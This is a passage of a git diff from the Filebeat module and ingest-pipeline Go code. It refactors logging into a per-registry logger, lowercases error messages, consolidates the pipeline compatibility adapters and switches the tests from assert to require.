beat.Info, ) (*ModuleRegistry, error) { - - var reg ModuleRegistry - reg.registry = map[string]map[string]*Fileset{} + reg := ModuleRegistry{ + registry: map[string]map[string]*Fileset{}, + log: logp.NewLogger(logName), + } for _, mcfg := range moduleConfigs { - if mcfg.Enabled != nil && (*mcfg.Enabled) == false { + if mcfg.Enabled != nil && !(*mcfg.Enabled) { continue } // Look for moved modules if module, moved := getCurrentModuleName(modulesPath, mcfg.Module); moved { - logp.Warn("Using old name '%s' for module '%s', please update your configuration", mcfg.Module, module) + reg.log.Warnf("Configuration uses the old name %q for module %q, please update your configuration.", mcfg.Module, module) mcfg.Module = module } reg.registry[mcfg.Module] = map[string]*Fileset{} moduleFilesets, err := getModuleFilesets(modulesPath, mcfg.Module) if err != nil { - return nil, fmt.Errorf("Error getting filesets for module %s: %v", mcfg.Module, err) + return nil, fmt.Errorf("error getting filesets for module %s: %v", mcfg.Module, err) } for _, filesetName := range moduleFilesets { @@ -78,10 +77,10 @@ func newModuleRegistry(modulesPath string, fcfg, err = applyOverrides(fcfg, mcfg.Module, filesetName, overrides) if err != nil { - return nil, fmt.Errorf("Error applying overrides on fileset %s/%s: %v", mcfg.Module, filesetName, err) + return nil, fmt.Errorf("error applying overrides on fileset %s/%s: %v", mcfg.Module, filesetName, err) } - if fcfg.Enabled != nil && (*fcfg.Enabled) == false { + if fcfg.Enabled != nil && !(*fcfg.Enabled) { continue } @@ -89,16 +88,15 @@ func newModuleRegistry(modulesPath string, if err != nil { return nil, err } - err = fileset.Read(beatInfo) - if err != nil { - return nil, fmt.Errorf("Error reading fileset %s/%s: %v", mcfg.Module, filesetName, err) + if err = fileset.Read(beatInfo); err != nil { + return nil, fmt.Errorf("error reading fileset %s/%s: %v", mcfg.Module, filesetName, err) } reg.registry[mcfg.Module][filesetName] = fileset } // check that no extra filesets are configured for filesetName, fcfg := range mcfg.Filesets { - if fcfg.Enabled != nil && (*fcfg.Enabled) == false { + if fcfg.Enabled != nil && !(*fcfg.Enabled) { continue } found := false @@ -122,8 +120,9 @@ func NewModuleRegistry(moduleConfigs []*common.Config, beatInfo beat.Info, init stat, err := os.Stat(modulesPath) if err != nil || !stat.IsDir() { - logp.Err("Not loading modules. Module directory not found: %s", modulesPath) - return &ModuleRegistry{}, nil // empty registry, no error + log := logp.NewLogger(logName) + log.Errorf("Not loading modules. Module directory not found: %s", modulesPath) + return &ModuleRegistry{log: log}, nil // empty registry, no error } var modulesCLIList []string @@ -217,7 +216,7 @@ func getModuleFilesets(modulePath, module string) ([]string, error) { return []string{}, err } - filesets := []string{} + var filesets []string for _, fi := range fileInfos { if fi.IsDir() { // check also that the `manifest.yml` file exists @@ -246,7 +245,7 @@ func applyOverrides(fcfg *FilesetConfig, config, err := common.NewConfigFrom(fcfg) if err != nil { - return nil, fmt.Errorf("Error creating vars config object: %v", err) + return nil, fmt.Errorf("error creating vars config object: %v", err) } toMerge := []*common.Config{config} @@ -254,12 +253,12 @@ func applyOverrides(fcfg *FilesetConfig, resultConfig, err := common.MergeConfigs(toMerge...) if err != nil { - return nil, fmt.Errorf("Error merging configs: %v", err) + return nil, fmt.Errorf("error merging configs: %v", err) } res, err := NewFilesetConfig(resultConfig) if err != nil { - return nil, fmt.Errorf("Error unpacking configs: %v", err) + return nil, fmt.Errorf("error unpacking configs: %v", err) } return res, nil @@ -275,7 +274,7 @@ func appendWithoutDuplicates(moduleConfigs []*ModuleConfig, modules []string) ([ // built a dictionary with the configured modules modulesMap := map[string]bool{} for _, mcfg := range moduleConfigs { - if mcfg.Enabled != nil && (*mcfg.Enabled) == false { + if mcfg.Enabled != nil && !(*mcfg.Enabled) { continue } modulesMap[mcfg.Module] = true @@ -291,12 +290,12 @@ func appendWithoutDuplicates(moduleConfigs []*ModuleConfig, modules []string) ([ } func (reg *ModuleRegistry) GetInputConfigs() ([]*common.Config, error) { - result := []*common.Config{} + var result []*common.Config for module, filesets := range reg.registry { for name, fileset := range filesets { fcfg, err := fileset.getInputConfig() if err != nil { - return result, fmt.Errorf("Error getting config for fileset %s/%s: %v", + return result, fmt.Errorf("error getting config for fileset %s/%s: %v", module, name, err) } result = append(result, fcfg) @@ -340,17 +339,17 @@ func checkAvailableProcessors(esClient PipelineLoader, requiredProcessors []Proc } status, body, err := esClient.Request("GET", "/_nodes/ingest", "", nil, nil) if err != nil { - return fmt.Errorf("Error querying _nodes/ingest: %v", err) + return fmt.Errorf("error querying _nodes/ingest: %v", err) } if status > 299 { - return fmt.Errorf("Error querying _nodes/ingest. Status: %d. Response body: %s", status, body) + return fmt.Errorf("error querying _nodes/ingest. Status: %d. Response body: %s", status, body) } err = json.Unmarshal(body, &response) if err != nil { - return fmt.Errorf("Error unmarshaling json when querying _nodes/ingest. Body: %s", body) + return fmt.Errorf("error unmarshaling json when querying _nodes/ingest. Body: %s", body) } - missing := []ProcessorRequirement{} + var missing []ProcessorRequirement for _, requiredProcessor := range requiredProcessors { for _, node := range response.Nodes { available := false @@ -368,11 +367,11 @@ func checkAvailableProcessors(esClient PipelineLoader, requiredProcessors []Proc } if len(missing) > 0 { - missingPlugins := []string{} + var missingPlugins []string for _, proc := range missing { missingPlugins = append(missingPlugins, proc.Plugin) } - errorMsg := fmt.Sprintf("This module requires the following Elasticsearch plugins: %s. "+ + errorMsg := fmt.Sprintf("this module requires the following Elasticsearch plugins: %s. "+ "You can install them by running the following commands on all the Elasticsearch nodes:", strings.Join(missingPlugins, ", ")) for _, plugin := range missingPlugins { diff --git a/filebeat/fileset/modules_integration_test.go b/filebeat/fileset/modules_integration_test.go index 00ced07f6b8a..b4b5c40bb754 100644 --- a/filebeat/fileset/modules_integration_test.go +++ b/filebeat/fileset/modules_integration_test.go @@ -25,10 +25,12 @@ import ( "testing" "github.com/stretchr/testify/assert" + "github.com/stretchr/testify/require" "github.com/elastic/beats/v7/libbeat/beat" "github.com/elastic/beats/v7/libbeat/esleg/eslegclient" "github.com/elastic/beats/v7/libbeat/esleg/eslegtest" + "github.com/elastic/beats/v7/libbeat/logp" ) func makeTestInfo(version string) beat.Info { @@ -48,8 +50,8 @@ func TestLoadPipeline(t *testing.T) { content := map[string]interface{}{ "description": "describe pipeline", - "processors": []map[string]interface{}{ - { + "processors": []interface{}{ + map[string]interface{}{ "set": map[string]interface{}{ "field": "foo", "value": "bar", @@ -58,28 +60,29 @@ func TestLoadPipeline(t *testing.T) { }, } - err := loadPipeline(client, "my-pipeline-id", content, false) - assert.NoError(t, err) + log := logp.NewLogger(logName) + err := loadPipeline(client, "my-pipeline-id", content, false, log) + require.NoError(t, err) status, _, err := client.Request("GET", "/_ingest/pipeline/my-pipeline-id", "", nil, nil) - assert.NoError(t, err) + require.NoError(t, err) assert.Equal(t, 200, status) // loading again shouldn't actually update the pipeline content["description"] = "describe pipeline 2" - err = loadPipeline(client, "my-pipeline-id", content, false) - assert.NoError(t, err) + err = loadPipeline(client, "my-pipeline-id", content, false, log) + require.NoError(t, err) checkUploadedPipeline(t, client, "describe pipeline") // loading again updates the pipeline - err = loadPipeline(client, "my-pipeline-id", content, true) - assert.NoError(t, err) + err = loadPipeline(client, "my-pipeline-id", content, true, log) + require.NoError(t, err) checkUploadedPipeline(t, client, "describe pipeline 2") } func checkUploadedPipeline(t *testing.T, client *eslegclient.Connection, expectedDescription string) { status, response, err := client.Request("GET", "/_ingest/pipeline/my-pipeline-id", "", nil, nil) - assert.NoError(t, err) + require.NoError(t, err) assert.Equal(t, 200, status) var res map[string]interface{} @@ -99,10 +102,10 @@ func TestSetupNginx(t *testing.T) { client.Request("DELETE", "/_ingest/pipeline/filebeat-5.2.0-nginx-error-pipeline", "", nil, nil) modulesPath, err := filepath.Abs("../module") - assert.NoError(t, err) + require.NoError(t, err) configs := []*ModuleConfig{ - &ModuleConfig{Module: "nginx"}, + {Module: "nginx"}, } reg, err := newModuleRegistry(modulesPath, configs, nil, makeTestInfo("5.2.0")) @@ -133,7 +136,7 @@ func TestAvailableProcessors(t *testing.T) { } err := checkAvailableProcessors(client, requiredProcessors) - assert.NoError(t, err) + require.NoError(t, err) // these don't exists on our integration test setup requiredProcessors = []ProcessorRequirement{ @@ -172,13 +175,13 @@ func TestLoadMultiplePipelines(t *testing.T) { client.Request("DELETE", "/_ingest/pipeline/filebeat-6.6.0-foo-multi-plain_logs", "", nil, nil) modulesPath, err := filepath.Abs("../_meta/test/module") - assert.NoError(t, err) + require.NoError(t, err) enabled := true disabled := false filesetConfigs := map[string]*FilesetConfig{ - "multi": &FilesetConfig{Enabled: &enabled}, - "multibad": &FilesetConfig{Enabled: &disabled}, + "multi": {Enabled: &enabled}, + "multibad": {Enabled: &disabled}, } configs := []*ModuleConfig{ &ModuleConfig{"foo", &enabled, filesetConfigs}, @@ -217,16 +220,16 @@ func TestLoadMultiplePipelinesWithRollback(t *testing.T) { client.Request("DELETE", "/_ingest/pipeline/filebeat-6.6.0-foo-multibad-plain_logs_bad", "", nil, nil) modulesPath, err := filepath.Abs("../_meta/test/module") - assert.NoError(t, err) + require.NoError(t, err) enabled := true disabled := false filesetConfigs := map[string]*FilesetConfig{ - "multi": &FilesetConfig{Enabled: &disabled}, - "multibad": &FilesetConfig{Enabled: &enabled}, + "multi": {Enabled: &disabled}, + "multibad": {Enabled: &enabled}, } configs := []*ModuleConfig{ - &ModuleConfig{"foo", &enabled, filesetConfigs}, + {"foo", &enabled, filesetConfigs}, } reg, err := newModuleRegistry(modulesPath, configs, nil, makeTestInfo("6.6.0")) diff --git a/filebeat/fileset/modules_test.go b/filebeat/fileset/modules_test.go index 371b051084db..f69db27648c5 100644 --- a/filebeat/fileset/modules_test.go +++ b/filebeat/fileset/modules_test.go @@ -26,6 +26,7 @@ import ( "testing" "github.com/stretchr/testify/assert" + "github.com/stretchr/testify/require" "github.com/elastic/beats/v7/libbeat/beat" "github.com/elastic/beats/v7/libbeat/common" @@ -42,17 +43,17 @@ func load(t *testing.T, from interface{}) *common.Config { func TestNewModuleRegistry(t *testing.T) { modulesPath, err := filepath.Abs("../module") - assert.NoError(t, err) + require.NoError(t, err) configs := []*ModuleConfig{ - &ModuleConfig{Module: "nginx"}, - &ModuleConfig{Module: "mysql"}, - &ModuleConfig{Module: "system"}, - &ModuleConfig{Module: "auditd"}, + {Module: "nginx"}, + {Module: "mysql"}, + {Module: "system"}, + {Module: "auditd"}, } reg, err := newModuleRegistry(modulesPath, configs, nil, beat.Info{Version: "5.2.0"}) - assert.NoError(t, err) + require.NoError(t, err) assert.NotNil(t, reg) expectedModules := map[string][]string{ @@ -77,14 +78,14 @@ func TestNewModuleRegistry(t *testing.T) { for module, filesets := range reg.registry { for name, fileset := range filesets { cfg, err := fileset.getInputConfig() - assert.NoError(t, err, fmt.Sprintf("module: %s, fileset: %s", module, name)) + require.NoError(t, err, fmt.Sprintf("module: %s, fileset: %s", module, name)) moduleName, err := cfg.String("_module_name", -1) - assert.NoError(t, err) + require.NoError(t, err) assert.Equal(t, module, moduleName) filesetName, err := cfg.String("_fileset_name", -1) - assert.NoError(t, err) + require.NoError(t, err) assert.Equal(t, name, filesetName) } } @@ -92,12 +93,12 @@ func TestNewModuleRegistry(t *testing.T) { func TestNewModuleRegistryConfig(t *testing.T) { modulesPath, err := filepath.Abs("../module") - assert.NoError(t, err) + require.NoError(t, err) falseVar := false configs := []*ModuleConfig{ - &ModuleConfig{ + { Module: "nginx", Filesets: map[string]*FilesetConfig{ "access": { @@ -110,29 +111,30 @@ func TestNewModuleRegistryConfig(t *testing.T) { }, }, }, - &ModuleConfig{ + { Module: "mysql", Enabled: &falseVar, }, } reg, err := newModuleRegistry(modulesPath, configs, nil, beat.Info{Version: "5.2.0"}) - assert.NoError(t, err) + require.NoError(t, err) assert.NotNil(t, reg) nginxAccess := reg.registry["nginx"]["access"] - assert.NotNil(t, nginxAccess) - assert.Equal(t, []interface{}{"/hello/test"}, nginxAccess.vars["paths"]) + if assert.NotNil(t, nginxAccess) { + assert.Equal(t, []interface{}{"/hello/test"}, nginxAccess.vars["paths"]) + } assert.NotContains(t, reg.registry["nginx"], "error") } func TestMovedModule(t *testing.T) { modulesPath, err := filepath.Abs("./test/moved_module") - assert.NoError(t, err) + require.NoError(t, err) configs := []*ModuleConfig{ - &ModuleConfig{ + { Module: "old", Filesets: map[string]*FilesetConfig{ "test": {}, @@ -141,7 +143,7 @@ func TestMovedModule(t *testing.T) { } reg, err := newModuleRegistry(modulesPath, configs, nil, beat.Info{Version: "5.2.0"}) - assert.NoError(t, err) + require.NoError(t, err) assert.NotNil(t, reg) } @@ -232,7 +234,7 @@ func TestApplyOverrides(t *testing.T) { for _, test := range tests { t.Run(test.name, func(t *testing.T) { result, err := applyOverrides(&test.fcfg, test.module, test.fileset, test.overrides) - assert.NoError(t, err) + require.NoError(t, err) assert.Equal(t, &test.expected, result) }) } @@ -251,15 +253,15 @@ func TestAppendWithoutDuplicates(t *testing.T) { configs: []*ModuleConfig{}, modules: []string{"moduleA", "moduleB", "moduleC"}, expected: []*ModuleConfig{ - &ModuleConfig{Module: "moduleA"}, - &ModuleConfig{Module: "moduleB"}, - &ModuleConfig{Module: "moduleC"}, + {Module: "moduleA"}, + {Module: "moduleB"}, + {Module: "moduleC"}, }, }, { name: "eliminate a duplicate, no override", configs: []*ModuleConfig{ - &ModuleConfig{ + { Module: "moduleB", Filesets: map[string]*FilesetConfig{ "fileset": { @@ -272,7 +274,7 @@ func TestAppendWithoutDuplicates(t *testing.T) { }, modules: []string{"moduleA", "moduleB", "moduleC"}, expected: []*ModuleConfig{ - &ModuleConfig{ + { Module: "moduleB", Filesets: map[string]*FilesetConfig{ "fileset": { @@ -282,14 +284,14 @@ func TestAppendWithoutDuplicates(t *testing.T) { }, }, }, - &ModuleConfig{Module: "moduleA"}, - &ModuleConfig{Module: "moduleC"}, + {Module: "moduleA"}, + {Module: "moduleC"}, }, }, { name: "disabled config", configs: []*ModuleConfig{ - &ModuleConfig{ + { Module: "moduleB", Enabled: &falseVar, Filesets: map[string]*FilesetConfig{ @@ -303,7 +305,7 @@ func TestAppendWithoutDuplicates(t *testing.T) { }, modules: []string{"moduleA", "moduleB", "moduleC"}, expected: []*ModuleConfig{ - &ModuleConfig{ + { Module: "moduleB", Enabled: &falseVar, Filesets: map[string]*FilesetConfig{ @@ -314,9 +316,9 @@ func TestAppendWithoutDuplicates(t *testing.T) { }, }, }, - &ModuleConfig{Module: "moduleA"}, - &ModuleConfig{Module: "moduleB"}, - &ModuleConfig{Module: "moduleC"}, + {Module: "moduleA"}, + {Module: "moduleB"}, + {Module: "moduleC"}, }, }, } @@ -324,7 +326,7 @@ func TestAppendWithoutDuplicates(t *testing.T) { for _, test := range tests { t.Run(test.name, func(t *testing.T) { result, err := appendWithoutDuplicates(test.configs, test.modules) - assert.NoError(t, err) + require.NoError(t, err) assert.Equal(t, test.expected, result) }) } @@ -377,7 +379,7 @@ func TestMcfgFromConfig(t *testing.T) { for _, test := range tests { t.Run(test.name, func(t *testing.T) { result, err := mcfgFromConfig(test.config) - assert.NoError(t, err) + require.NoError(t, err) assert.Equal(t, test.expected.Module, result.Module) assert.Equal(t, len(test.expected.Filesets), len(result.Filesets)) for name, fileset := range test.expected.Filesets { @@ -397,12 +399,12 @@ func TestMissingModuleFolder(t *testing.T) { } reg, err := NewModuleRegistry(configs, beat.Info{Version: "5.2.0"}, true) - assert.NoError(t, err) + require.NoError(t, err) assert.NotNil(t, reg) // this should return an empty list, but no error inputs, err := reg.GetInputConfigs() - assert.NoError(t, err) + require.NoError(t, err) assert.Equal(t, 0, len(inputs)) } @@ -415,19 +417,19 @@ func TestInterpretError(t *testing.T) { { Test: "other plugin not installed", Input: `{"error":{"root_cause":[{"type":"parse_exception","reason":"No processor type exists with name [hello_test]","header":{"processor_type":"hello_test"}}],"type":"parse_exception","reason":"No processor type exists with name [hello_test]","header":{"processor_type":"hello_test"}},"status":400}`, - Output: "This module requires an Elasticsearch plugin that provides the hello_test processor. " + + Output: "this module requires an Elasticsearch plugin that provides the hello_test processor. " + "Please visit the Elasticsearch documentation for instructions on how to install this plugin. " + "Response body: " + `{"error":{"root_cause":[{"type":"parse_exception","reason":"No processor type exists with name [hello_test]","header":{"processor_type":"hello_test"}}],"type":"parse_exception","reason":"No processor type exists with name [hello_test]","header":{"processor_type":"hello_test"}},"status":400}`, }, { Test: "Elasticsearch 2.4", Input: `{"error":{"root_cause":[{"type":"invalid_index_name_exception","reason":"Invalid index name [_ingest], must not start with '_'","index":"_ingest"}],"type":"invalid_index_name_exception","reason":"Invalid index name [_ingest], must not start with '_'","index":"_ingest"},"status":400}`, - Output: `The Ingest Node functionality seems to be missing from Elasticsearch. The Filebeat modules require Elasticsearch >= 5.0. This is the response I got from Elasticsearch: {"error":{"root_cause":[{"type":"invalid_index_name_exception","reason":"Invalid index name [_ingest], must not start with '_'","index":"_ingest"}],"type":"invalid_index_name_exception","reason":"Invalid index name [_ingest], must not start with '_'","index":"_ingest"},"status":400}`, + Output: `the Ingest Node functionality seems to be missing from Elasticsearch. The Filebeat modules require Elasticsearch >= 5.0. This is the response I got from Elasticsearch: {"error":{"root_cause":[{"type":"invalid_index_name_exception","reason":"Invalid index name [_ingest], must not start with '_'","index":"_ingest"}],"type":"invalid_index_name_exception","reason":"Invalid index name [_ingest], must not start with '_'","index":"_ingest"},"status":400}`, }, { Test: "Elasticsearch 1.7", Input: `{"error":"InvalidIndexNameException[[_ingest] Invalid index name [_ingest], must not start with '_']","status":400}`, - Output: `The Filebeat modules require Elasticsearch >= 5.0. This is the response I got from Elasticsearch: {"error":"InvalidIndexNameException[[_ingest] Invalid index name [_ingest], must not start with '_']","status":400}`, + Output: `the Filebeat modules require Elasticsearch >= 5.0. This is the response I got from Elasticsearch: {"error":"InvalidIndexNameException[[_ingest] Invalid index name [_ingest], must not start with '_']","status":400}`, }, { Test: "bad json", diff --git a/filebeat/fileset/pipelines.go b/filebeat/fileset/pipelines.go index fe7eb86c884d..a3ce0b3de423 100644 --- a/filebeat/fileset/pipelines.go +++ b/filebeat/fileset/pipelines.go @@ -64,17 +64,17 @@ func (reg *ModuleRegistry) LoadPipelines(esClient PipelineLoader, overwrite bool for name, fileset := range filesets { // check that all the required Ingest Node plugins are available requiredProcessors := fileset.GetRequiredProcessors() - logp.Debug("modules", "Required processors: %s", requiredProcessors) + reg.log.Debugf("Required processors: %s", requiredProcessors) if len(requiredProcessors) > 0 { err := checkAvailableProcessors(esClient, requiredProcessors) if err != nil { - return fmt.Errorf("Error loading pipeline for fileset %s/%s: %v", module, name, err) + return fmt.Errorf("error loading pipeline for fileset %s/%s: %v", module, name, err) } } pipelines, err := fileset.GetPipelines(esClient.GetVersion()) if err != nil { - return fmt.Errorf("Error getting pipeline for fileset %s/%s: %v", module, name, err) + return fmt.Errorf("error getting pipeline for fileset %s/%s: %v", module, name, err) } // Filesets with multiple pipelines can only be supported by Elasticsearch >= 6.5.0 @@ -86,9 +86,9 @@ func (reg *ModuleRegistry) LoadPipelines(esClient PipelineLoader, overwrite bool var pipelineIDsLoaded []string for _, pipeline := range pipelines { - err = loadPipeline(esClient, pipeline.id, pipeline.contents, overwrite) + err = loadPipeline(esClient, pipeline.id, pipeline.contents, overwrite, reg.log.With("pipeline", pipeline.id)) if err != nil { - err = fmt.Errorf("Error loading pipeline for fileset %s/%s: %v", module, name, err) + err = fmt.Errorf("error loading pipeline for fileset %s/%s: %v", module, name, err) break } pipelineIDsLoaded = append(pipelineIDsLoaded, pipeline.id) @@ -112,69 +112,25 @@ func (reg *ModuleRegistry) LoadPipelines(esClient PipelineLoader, overwrite bool return nil } -func loadPipeline(esClient PipelineLoader, pipelineID string, content map[string]interface{}, overwrite bool) error { +func loadPipeline(esClient PipelineLoader, pipelineID string, content map[string]interface{}, overwrite bool, log *logp.Logger) error { path := makeIngestPipelinePath(pipelineID) if !overwrite { status, _, _ := esClient.Request("GET", path, "", nil, nil) if status == 200 { - logp.Debug("modules", "Pipeline %s already loaded", pipelineID) + log.Debug("Pipeline already exists in Elasticsearch.") return nil } } - err := setECSProcessors(esClient.GetVersion(), pipelineID, content) - if err != nil { - return fmt.Errorf("failed to adapt pipeline for ECS compatibility: %v", err) - } - - err = modifySetProcessor(esClient.GetVersion(), pipelineID, content) - if err != nil { - return fmt.Errorf("failed to modify set processor in pipeline: %v", err) - } - - if err := modifyAppendProcessor(esClient.GetVersion(), pipelineID, content); err != nil { - return fmt.Errorf("failed to modify append processor in pipeline: %v", err) + if err := adaptPipelineForCompatibility(esClient.GetVersion(), pipelineID, content, log); err != nil { + return fmt.Errorf("failed to adapt pipeline with backwards compatibility changes: %w", err) } body, err := esClient.LoadJSON(path, content) if err != nil { return interpretError(err, body) } - logp.Info("Elasticsearch pipeline with ID '%s' loaded", pipelineID) - return nil -} - -// setECSProcessors sets required ECS options in processors when filebeat version is >= 7.0.0 -// and ES is 6.7.X to ease migration to ECS. -func setECSProcessors(esVersion common.Version, pipelineID string, content map[string]interface{}) error { - ecsVersion := common.MustNewVersion("7.0.0") - if !esVersion.LessThan(ecsVersion) { - return nil - } - - p, ok := content["processors"] - if !ok { - return nil - } - processors, ok := p.([]interface{}) - if !ok { - return fmt.Errorf("'processors' in pipeline '%s' expected to be a list, found %T", pipelineID, p) - } - - minUserAgentVersion := common.MustNewVersion("6.7.0") - for _, p := range processors { - processor, ok := p.(map[string]interface{}) - if !ok { - continue - } - if options, ok := processor["user_agent"].(map[string]interface{}); ok { - if esVersion.LessThan(minUserAgentVersion) { - return fmt.Errorf("user_agent processor requires option 'ecs: true', but Elasticsearch %v does not support this option (Elasticsearch %v or newer is required)", esVersion, minUserAgentVersion) - } - logp.Debug("modules", "Setting 'ecs: true' option in user_agent processor for field '%v' in pipeline '%s'", options["field"], pipelineID) - options["ecs"] = true - } - } + log.Info("Elasticsearch pipeline loaded.") return nil } @@ -209,7 +165,7 @@ func interpretError(initialErr error, body []byte) error { } err1x := json.Unmarshal(body, &response1x) if err1x == nil && response1x.Error != "" { - return fmt.Errorf("The Filebeat modules require Elasticsearch >= 5.0. "+ + return fmt.Errorf("the Filebeat modules require Elasticsearch >= 5.0. "+ "This is the response I got from Elasticsearch: %s", body) } @@ -223,7 +179,7 @@ func interpretError(initialErr error, body []byte) error { strings.HasPrefix(response.Error.RootCause[0].Reason, "No processor type exists with name") && response.Error.RootCause[0].Header.ProcessorType != "" { - return fmt.Errorf("This module requires an Elasticsearch plugin that provides the %s processor. "+ + return fmt.Errorf("this module requires an Elasticsearch plugin that provides the %s processor. "+ "Please visit the Elasticsearch documentation for instructions on how to install this plugin. "+ "Response body: %s", response.Error.RootCause[0].Header.ProcessorType, body) @@ -234,134 +190,10 @@ func interpretError(initialErr error, body []byte) error { response.Error.RootCause[0].Type == "invalid_index_name_exception" && response.Error.RootCause[0].Index == "_ingest" { - return fmt.Errorf("The Ingest Node functionality seems to be missing from Elasticsearch. "+ + return fmt.Errorf("the Ingest Node functionality seems to be missing from Elasticsearch. "+ "The Filebeat modules require Elasticsearch >= 5.0. "+ "This is the response I got from Elasticsearch: %s", body) } return fmt.Errorf("couldn't load pipeline: %v. Response body: %s", initialErr, body) } - -// modifySetProcessor replaces ignore_empty_value option with an if statement -// so ES less than 7.9 will still work -func modifySetProcessor(esVersion common.Version, pipelineID string, content map[string]interface{}) error { - flagVersion := common.MustNewVersion("7.9.0") - if !esVersion.LessThan(flagVersion) { - return nil - } - - p, ok := content["processors"] - if !ok { - return nil - } - processors, ok := p.([]interface{}) - if !ok { - return fmt.Errorf("'processors' in pipeline '%s' expected to be a list, found %T", pipelineID, p) - } - - for _, p := range processors { - processor, ok := p.(map[string]interface{}) - if !ok { - continue - } - if options, ok := processor["set"].(map[string]interface{}); ok { - _, ok := options["ignore_empty_value"].(bool) - if !ok { - // don't have ignore_empty_value nothing to do - continue - } - - logp.Debug("modules", "In pipeline %q removing unsupported 'ignore_empty_value' in set processor", pipelineID) - delete(options, "ignore_empty_value") - - _, ok = options["if"].(string) - if ok { - // assume if check is sufficient - continue - } - val, ok := options["value"].(string) - if !ok { - continue - } - - newIf := strings.TrimLeft(val, "{ ") - newIf = strings.TrimRight(newIf, "} ") - newIf = strings.ReplaceAll(newIf, ".", "?.") - newIf = "ctx?." + newIf + " != null" - - logp.Debug("modules", "In pipeline %q adding if %s to replace 'ignore_empty_value' in set processor", pipelineID, newIf) - options["if"] = newIf - } - } - return nil -} - -// modifyAppendProcessor replaces allow_duplicates option with an if statement -// so ES less than 7.10 will still work -func modifyAppendProcessor(esVersion common.Version, pipelineID string, content map[string]interface{}) error { - flagVersion := common.MustNewVersion("7.10.0") - if !esVersion.LessThan(flagVersion) { - return nil - } - - p, ok := content["processors"] - if !ok { - return nil - } - processors, ok := p.([]interface{}) - if !ok { - return fmt.Errorf("'processors' in pipeline '%s' expected to be a list, found %T", pipelineID, p) - } - - for _, p := range processors { - processor, ok := p.(map[string]interface{}) - if !ok { - continue - } - if options, ok := processor["append"].(map[string]interface{}); ok { - allow, ok := options["allow_duplicates"].(bool) - if !ok { - // don't have allow_duplicates, nothing to do - continue - } - - logp.Debug("modules", "In pipeline %q removing unsupported 'allow_duplicates' in append processor", pipelineID) - delete(options, "allow_duplicates") - if allow { - // it was set to true, nothing else to do after removing the option - continue - } - - currIf, _ := options["if"].(string) - if strings.Contains(strings.ToLower(currIf), "contains") { - // if it has a contains statement, we assume it is checking for duplicates already - continue - } - field, ok := options["field"].(string) - if !ok { - continue - } - val, ok := options["value"].(string) - if !ok { - continue - } - - field = strings.ReplaceAll(field, ".", "?.") - - val = strings.TrimLeft(val, "{ ") - val = strings.TrimRight(val, "} ") - val = strings.ReplaceAll(val, ".", "?.") - - if currIf == "" { - // if there is not a previous if we add a value sanity check - currIf = fmt.Sprintf("ctx?.%s != null", val) - } - - newIf := fmt.Sprintf("%s && ((ctx?.%s instanceof List && !ctx?.%s.contains(ctx?.%s)) || ctx?.%s != ctx?.%s)", currIf, field, field, val, field, val) - - logp.Debug("modules", "In pipeline %q adding if %s to replace 'allow_duplicates: false' in append processor", pipelineID, newIf) - options["if"] = newIf - } - } - return nil -} diff --git a/filebeat/fileset/pipelines_test.go b/filebeat/fileset/pipelines_test.go index 7c617034f107..04d48c67f019 100644 --- a/filebeat/fileset/pipelines_test.go +++ b/filebeat/fileset/pipelines_test.go @@ -25,10 +25,11 @@ import ( "testing" "time" - "github.com/elastic/beats/v7/libbeat/common" - "github.com/elastic/beats/v7/libbeat/esleg/eslegclient" - "github.com/stretchr/testify/assert" + "github.com/stretchr/testify/require" + + "github.com/elastic/beats/v7/libbeat/esleg/eslegclient" + "github.com/elastic/beats/v7/libbeat/logp" ) func TestLoadPipelinesWithMultiPipelineFileset(t *testing.T) { @@ -81,6 +82,7 @@ func TestLoadPipelinesWithMultiPipelineFileset(t *testing.T) { "fls": testFileset, }, }, + log: logp.NewLogger(logName), } testESServer := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { @@ -92,10 +94,10 @@ func TestLoadPipelinesWithMultiPipelineFileset(t *testing.T) { URL: testESServer.URL, Timeout: 90 * time.Second, }) - assert.NoError(t, err) + require.NoError(t, err) err = testESClient.Connect() - assert.NoError(t, err) + require.NoError(t, err) err = testRegistry.LoadPipelines(testESClient, false) if test.isErrExpected { @@ -106,491 +108,3 @@ func TestLoadPipelinesWithMultiPipelineFileset(t *testing.T) { }) } } - -func TestSetEcsProcessors(t *testing.T) { - cases := []struct { - name string - esVersion *common.Version - content map[string]interface{} - expected map[string]interface{} - isErrExpected bool - }{ - { - name: "ES < 6.7.0", - esVersion: common.MustNewVersion("6.6.0"), - content: map[string]interface{}{ - "processors": []interface{}{ - map[string]interface{}{ - "user_agent": map[string]interface{}{ - "field": "foo.http_user_agent", - }, - }, - }}, - isErrExpected: true, - }, - { - name: "ES == 6.7.0", - esVersion: common.MustNewVersion("6.7.0"), - content: map[string]interface{}{ - "processors": []interface{}{ - map[string]interface{}{ - "rename": map[string]interface{}{ - "field": "foo.src_ip", - "target_field": "source.ip", - }, - }, - map[string]interface{}{ - "user_agent": map[string]interface{}{ - "field": "foo.http_user_agent", - }, - }, - }, - }, - expected: map[string]interface{}{ - "processors": []interface{}{ - map[string]interface{}{ - "rename": map[string]interface{}{ - "field": "foo.src_ip", - "target_field": "source.ip", - }, - }, - map[string]interface{}{ - "user_agent": map[string]interface{}{ - "field": "foo.http_user_agent", - "ecs": true, - }, - }, - }, - }, - isErrExpected: false, - }, - { - name: "ES >= 7.0.0", - esVersion: common.MustNewVersion("7.0.0"), - content: map[string]interface{}{ - "processors": []interface{}{ - map[string]interface{}{ - "rename": map[string]interface{}{ - "field": "foo.src_ip", - "target_field": "source.ip", - }, - }, - map[string]interface{}{ - "user_agent": map[string]interface{}{ - "field": "foo.http_user_agent", - }, - }, - }, - }, - expected: map[string]interface{}{ - "processors": []interface{}{ - map[string]interface{}{ - "rename": map[string]interface{}{ - "field": "foo.src_ip", - "target_field": "source.ip", - }, - }, - map[string]interface{}{ - "user_agent": map[string]interface{}{ - "field": "foo.http_user_agent", - }, - }, - }, - }, - isErrExpected: false, - }, - } - - for _, test := range cases { - test := test - t.Run(test.name, func(t *testing.T) { - t.Parallel() - err := setECSProcessors(*test.esVersion, "foo-pipeline", test.content) - if test.isErrExpected { - assert.Error(t, err) - } else { - assert.NoError(t, err) - assert.Equal(t, test.expected, test.content) - } - }) - } -} - -func TestModifySetProcessor(t *testing.T) { - cases := []struct { - name string - esVersion 